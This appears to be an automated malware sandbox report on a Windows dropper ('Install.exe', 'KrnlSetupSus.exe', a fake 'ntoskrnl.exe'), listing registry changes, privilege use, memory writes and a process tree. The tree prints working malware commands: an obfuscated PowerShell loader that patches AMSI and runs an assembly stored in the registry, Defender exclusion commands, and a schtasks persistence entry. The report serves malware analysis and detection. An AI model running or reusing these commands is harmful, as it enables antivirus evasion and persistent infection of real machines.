\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02cnxzkyvoskyhsq\AppIdList = "{AFDA72BF-3409-413A-B54E-2AB8D66A7826};" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root WaaSMedicAgent.exe -
Modifies registry class 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 856 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3744 powershell.EXE 3744 powershell.EXE 3744 powershell.EXE 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4984 wmiprvse.exe 4984 wmiprvse.exe 4984 wmiprvse.exe 4984 wmiprvse.exe 4984 wmiprvse.exe 4984 wmiprvse.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4356 powershell.exe 4356 powershell.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4356 powershell.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 1156 powershell.exe 1156 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1396 KrnlSetupSus.exe Token: SeDebugPrivilege 3744 powershell.EXE Token: SeDebugPrivilege 3744 powershell.EXE Token: SeDebugPrivilege 4992 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 2232 svchost.exe Token: SeIncreaseQuotaPrivilege 2232 svchost.exe Token: SeSecurityPrivilege 2232 svchost.exe Token: SeTakeOwnershipPrivilege 2232 svchost.exe Token: SeLoadDriverPrivilege 2232 svchost.exe Token: SeSystemtimePrivilege 2232 svchost.exe Token: SeBackupPrivilege 2232 svchost.exe Token: SeRestorePrivilege 2232 svchost.exe Token: SeShutdownPrivilege 2232 svchost.exe Token: SeSystemEnvironmentPrivilege 2232 svchost.exe Token: SeUndockPrivilege 2232 svchost.exe Token: SeManageVolumePrivilege 2232 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2232 svchost.exe Token: SeIncreaseQuotaPrivilege 2232 svchost.exe Token: SeSecurityPrivilege 2232 svchost.exe Token: SeTakeOwnershipPrivilege 2232 svchost.exe Token: SeLoadDriverPrivilege 2232 svchost.exe Token: SeSystemtimePrivilege 2232 svchost.exe Token: SeBackupPrivilege 2232 svchost.exe Token: SeRestorePrivilege 2232 svchost.exe Token: SeShutdownPrivilege 2232 svchost.exe Token: SeSystemEnvironmentPrivilege 2232 svchost.exe Token: SeUndockPrivilege 2232 svchost.exe Token: SeManageVolumePrivilege 2232 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2232 svchost.exe Token: SeIncreaseQuotaPrivilege 2232 svchost.exe Token: SeSecurityPrivilege 2232 svchost.exe Token: SeTakeOwnershipPrivilege 2232 svchost.exe Token: SeLoadDriverPrivilege 2232 svchost.exe Token: SeSystemtimePrivilege 2232 svchost.exe Token: SeBackupPrivilege 2232 svchost.exe Token: SeRestorePrivilege 2232 svchost.exe Token: SeShutdownPrivilege 2232 svchost.exe Token: SeSystemEnvironmentPrivilege 2232 svchost.exe Token: SeUndockPrivilege 2232 svchost.exe Token: SeManageVolumePrivilege 2232 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2232 svchost.exe Token: SeIncreaseQuotaPrivilege 2232 svchost.exe Token: SeSecurityPrivilege 2232 svchost.exe Token: SeTakeOwnershipPrivilege 2232 svchost.exe Token: SeLoadDriverPrivilege 2232 svchost.exe Token: SeSystemtimePrivilege 2232 svchost.exe Token: SeBackupPrivilege 2232 svchost.exe Token: SeRestorePrivilege 2232 svchost.exe Token: SeShutdownPrivilege 2232 svchost.exe Token: SeSystemEnvironmentPrivilege 2232 svchost.exe Token: SeUndockPrivilege 2232 svchost.exe Token: SeManageVolumePrivilege 2232 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2232 svchost.exe Token: SeIncreaseQuotaPrivilege 2232 svchost.exe Token: SeSecurityPrivilege 2232 svchost.exe Token: SeTakeOwnershipPrivilege 2232 svchost.exe Token: SeLoadDriverPrivilege 2232 svchost.exe Token: SeSystemtimePrivilege 2232 svchost.exe Token: SeBackupPrivilege 2232 svchost.exe Token: SeRestorePrivilege 2232 svchost.exe Token: SeShutdownPrivilege 2232 svchost.exe Token: SeSystemEnvironmentPrivilege 2232 svchost.exe Token: SeUndockPrivilege 2232 svchost.exe Token: SeManageVolumePrivilege 2232 svchost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1396 KrnlSetupSus.exe -
Suspicious use of UnmapMainImage 2 IoCs
pid Process 4120 RuntimeBroker.exe 3572 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1288 wrote to memory of 696 1288 Install.exe 82 PID 1288 wrote to memory of 696 1288 Install.exe 82 PID 1288 wrote to memory of 696 1288 Install.exe 82 PID 1288 wrote to memory of 1396 1288 Install.exe 83 PID 1288 wrote to memory of 1396 1288 Install.exe 83 PID 3744 wrote to memory of 4992 3744 powershell.EXE 87 PID 3744 wrote to memory of 4992 3744 powershell.EXE 87 PID 3744 wrote to memory of 4992 3744 powershell.EXE 87 PID 3744 wrote to memory of 4992 3744 powershell.EXE 87 PID 3744 wrote to memory of 4992 3744 powershell.EXE 87 PID 3744 wrote to memory of 4992 3744 powershell.EXE 87 PID 3744 wrote to memory of 4992 3744 powershell.EXE 87 PID 3744 wrote to memory of 4992 3744 powershell.EXE 87 PID 4992 wrote to memory of 624 4992 dllhost.exe 5 PID 4992 wrote to memory of 680 4992 dllhost.exe 7 PID 4992 wrote to memory of 960 4992 dllhost.exe 12 PID 4992 wrote to memory of 336 4992 dllhost.exe 13 PID 4992 wrote to memory of 408 4992 dllhost.exe 14 PID 4992 wrote to memory of 1028 4992 dllhost.exe 15 PID 4992 wrote to memory of 1052 4992 dllhost.exe 17 PID 4992 wrote to memory of 1096 4992 dllhost.exe 18 PID 4992 wrote to memory of 1248 4992 dllhost.exe 19 PID 4992 wrote to memory of 1272 4992 dllhost.exe 20 PID 4992 wrote to memory of 1300 4992 dllhost.exe 21 PID 4992 wrote to memory of 1320 4992 dllhost.exe 22 PID 4992 wrote to memory of 1408 4992 dllhost.exe 23 PID 4992 wrote to memory of 1424 4992 dllhost.exe 24 PID 4992 wrote to memory of 1456 4992 dllhost.exe 25 PID 4992 wrote to memory of 1520 4992 dllhost.exe 26 PID 4992 wrote to memory of 1576 4992 dllhost.exe 27 PID 4992 wrote to memory of 1676 4992 dllhost.exe 28 PID 4992 wrote to memory of 1728 4992 dllhost.exe 29 PID 4992 wrote to memory of 1748 4992 dllhost.exe 30 PID 4992 wrote to memory of 1816 4992 dllhost.exe 31 PID 4992 wrote to memory of 1824 4992 dllhost.exe 32 PID 4992 wrote to memory of 1928 4992 dllhost.exe 33 PID 4992 wrote to memory of 1940 4992 dllhost.exe 34 PID 4992 wrote to memory of 2024 4992 dllhost.exe 35 PID 4992 wrote to memory of 2040 4992 dllhost.exe 36 PID 4992 wrote to memory of 2116 4992 dllhost.exe 37 PID 4992 wrote to memory of 2232 4992 dllhost.exe 39 PID 4992 wrote to memory of 2264 4992 dllhost.exe 40 PID 4992 wrote to memory of 2324 4992 dllhost.exe 41 PID 4992 wrote to memory of 2536 4992 dllhost.exe 42 PID 4992 wrote to memory of 2544 4992 dllhost.exe 43 PID 4992 wrote to memory of 2584 4992 dllhost.exe 44 PID 4992 wrote to memory of 2648 4992 dllhost.exe 45 PID 4992 wrote to memory of 2804 4992 dllhost.exe 46 PID 4992 wrote to memory of 2824 4992 dllhost.exe 47 PID 4992 wrote to memory of 2872 4992 dllhost.exe 48 PID 4992 wrote to memory of 2888 4992 dllhost.exe 49 PID 4992 wrote to memory of 2896 4992 dllhost.exe 50 PID 4992 wrote to memory of 2908 4992 dllhost.exe 51 PID 4992 wrote to memory of 2960 4992 dllhost.exe 52 PID 4992 wrote to memory of 3156 4992 dllhost.exe 53 PID 4992 wrote to memory of 3424 4992 dllhost.exe 55 PID 4992 wrote to memory of 3572 4992 dllhost.exe 56 PID 4992 wrote to memory of 3688 4992 dllhost.exe 57 PID 4992 wrote to memory of 3880 4992 dllhost.exe 58 PID 4992 wrote to memory of 4040 4992 dllhost.exe 60 PID 4992 wrote to memory of 4120 4992 dllhost.exe 62 PID 4992 wrote to memory of 3232 4992 dllhost.exe 66 PID 4992 wrote to memory of 4448 4992 dllhost.exe 67 PID 4992 wrote to memory of 3004 4992 dllhost.exe 68 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:624
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:336
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{29ea5ee3-5933-44cc-ae3a-243176ab51b9}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4992
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Drops file in System32 directory
PID:680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:408
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1028
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1052
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1096
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1248 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2960
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:dUFoGXpMKWgg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$KalhFafOcBVjHU,[Parameter(Position=1)][Type]$pzyDQrfWqz)$sIooZKTRqvc=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+'l'+''+[Char](101)+'ct'+[Char](101)+'dDel'+'e'+'g'+'a'+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+''+'e'+''+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+''+'l'+''+'e'+'',$False).DefineType(''+[Char](77)+'yD'+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+'e'+'T'+''+'y'+''+[Char](112)+''+[Char](101)+'','Cl'+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c,'+'S'+'e'+[Char](97)+''+[Char](108)+'ed,'+[Char](65)+''+'n'+''+[Char](115)+''+'i'+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+'A'+''+[Char](117)+'t'+'o'+''+[Char](67)+''+[Char](108)+''+'a'+'s'+'s'+'',[MulticastDelegate]);$sIooZKTRqvc.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+'e'+''+[Char](99)+'i'+'a'+''+'l'+''+'N'+''+[Char](97)+''+[Char](109)+'e'+[Char](44)+'H'+'i'+''+'d'+'e'+'B'+'ySi'+'g'+''+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+'l'+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$KalhFafOcBVjHU).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+'e'+[Char](100)+'');$sIooZKTRqvc.DefineMethod(''+[Char](73)+'n'+'v'+''+[Char](111)+''+[Char](107)+'e','P'+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c,'+[Char](72)+''+[Char](105)+'de'+'B'+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+'e'+''+[Char](119)+'Sl'+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$pzyDQrfWqz,$KalhFafOcBVjHU).SetImplementationFlags('R'+'u'+''+[Char](110)+''+[Char](116)+'i'+'m'+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+'e'+'d'+'');Write-Output $sIooZKTRqvc.CreateType();}$sKDhmNBjbzlVO=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+[Char](116)+''+'e'+''+'m'+'.d'+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+'i'+[Char](99)+''+[Char](114)+'o'+'s'+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+'W'+[Char](105)+''+[Char](110)+''+[Char](51)+''+'2'+''+[Char](46)+''+'U'+''+[Char](110)+'s'+'a'+''+[Char](102)+'e'+'N'+''+'a'+''+'t'+''+'i'+'v'+'e'+''+[Char](77)+'e'+'t'+''+'h'+''+[Char](111)+''+[Char](100)+'s');$isPSZOsfDrYNlz=$sKDhmNBjbzlVO.GetMethod('G'+'e'+''+[Char](116)+'Pr'+[Char](111)+'c'+'A'+''+'d'+''+[Char](100)+''+[Char](114)+'es'+[Char](115)+'',[Reflection.BindingFlags]('Pu'+[Char](98)+''+[Char](108)+'ic'+','+''+[Char](83)+'t'+[Char](97)+''+[Char](116)+'i'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$owPnTDyoSHLmhOgjRZC=dUFoGXpMKWgg @([String])([IntPtr]);$ggKPTxMgDAYcFsKtkccINS=dUFoGXpMKWgg @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$SEbheHSQugL=$sKDhmNBjbzlVO.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](77)+''+'o'+'d'+[Char](117)+''+'l'+''+[Char](101)+''+'H'+''+[Char](97)+''+[Char](110)+'d'+'l'+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+[Char](114)+'n'+'e'+'l'+'3'+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')));$vzMFMandytiSFI=$isPSZOsfDrYNlz.Invoke($Null,@([Object]$SEbheHSQugL,[Object]('L'+[Char](111)+''+[Char](97)+'d'+'L'+''+[Char](105)+''+[Char](98)+'r'+'a'+'r'+[Char](121)+''+[Char](65)+'')));$AmtqvpvviSMvkhPZt=$isPSZOsfDrYNlz.Invoke($Null,@([Object]$SEbheHSQugL,[Object]('Vi'+[Char](114)+''+'t'+''+'u'+''+[Char](97)+''+'l'+''+'P'+'ro'+'t'+''+'e'+'c'+[Char](116)+'')));$miFdSNV=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vzMFMandytiSFI,$owPnTDyoSHLmhOgjRZC).Invoke(''+[Char](97)+''+[Char](109)+'s'+[Char](105)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'');$FAYpSjqCkKuFlBwkv=$isPSZOsfDrYNlz.Invoke($Null,@([Object]$miFdSNV,[Object](''+[Char](65)+''+'m'+''+[Char](115)+'i'+[Char](83)+'c'+[Char](97)+''+[Char](110)+'Bu'+'f'+''+'f'+''+[Char](101)+''+[Char](114)+'')));$EsDOexMArT=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AmtqvpvviSMvkhPZt,$ggKPTxMgDAYcFsKtkccINS).Invoke($FAYpSjqCkKuFlBwkv,[uint32]8,4,[ref]$EsDOexMArT);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$FAYpSjqCkKuFlBwkv,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AmtqvpvviSMvkhPZt,$ggKPTxMgDAYcFsKtkccINS).Invoke($FAYpSjqCkKuFlBwkv,[uint32]8,0x20,[ref]$EsDOexMArT);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'$'+''+[Char](55)+''+[Char](55)+''+[Char](115)+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3744 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2068
-
-
-
C:\ProgramData\ntoskrnl.exeC:\ProgramData\ntoskrnl.exe2⤵
- Executes dropped EXE
PID:676
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1272
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1300
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1320
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1408
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1424
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1456
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1520
-
C:\Windows\system32\sihost.exesihost.exe2⤵
- Modifies registry class
PID:2584
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1576
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1676
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1728
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1748
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1816
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1824
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1928
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1940
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2024
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2040
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2116
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2232
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2264
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2324
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2536
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2544
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2648
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2804
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Enumerates connected drives
PID:2824
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2872
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2888
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2896
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2908
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3156
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3424
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of UnmapMainImage
PID:3572 -
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1288 -
C:\ProgramData\Install.exe"C:\ProgramData\Install.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:696
-
-
C:\ProgramData\KrnlSetupSus.exe"C:\ProgramData\KrnlSetupSus.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1396 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\KrnlSetupSus.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4356 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:4024
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'KrnlSetupSus.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1156 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:4764
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\ntoskrnl.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:3352 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:5008
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ntoskrnl.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:4552 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:2156
-
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "ntoskrnl" /tr "C:\ProgramData\ntoskrnl.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:856 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:2424
-
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /delete /f /tn "ntoskrnl"4⤵PID:2156
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp3042.tmp.bat""4⤵PID:972
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:3852
-
-
C:\Windows\system32\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:1068
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3688
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3880
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4040
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
PID:4120
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:3232
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4448
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:3004
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1552
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:2840
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:5060
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
PID:1468
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:1040
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:1692
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:5032
-
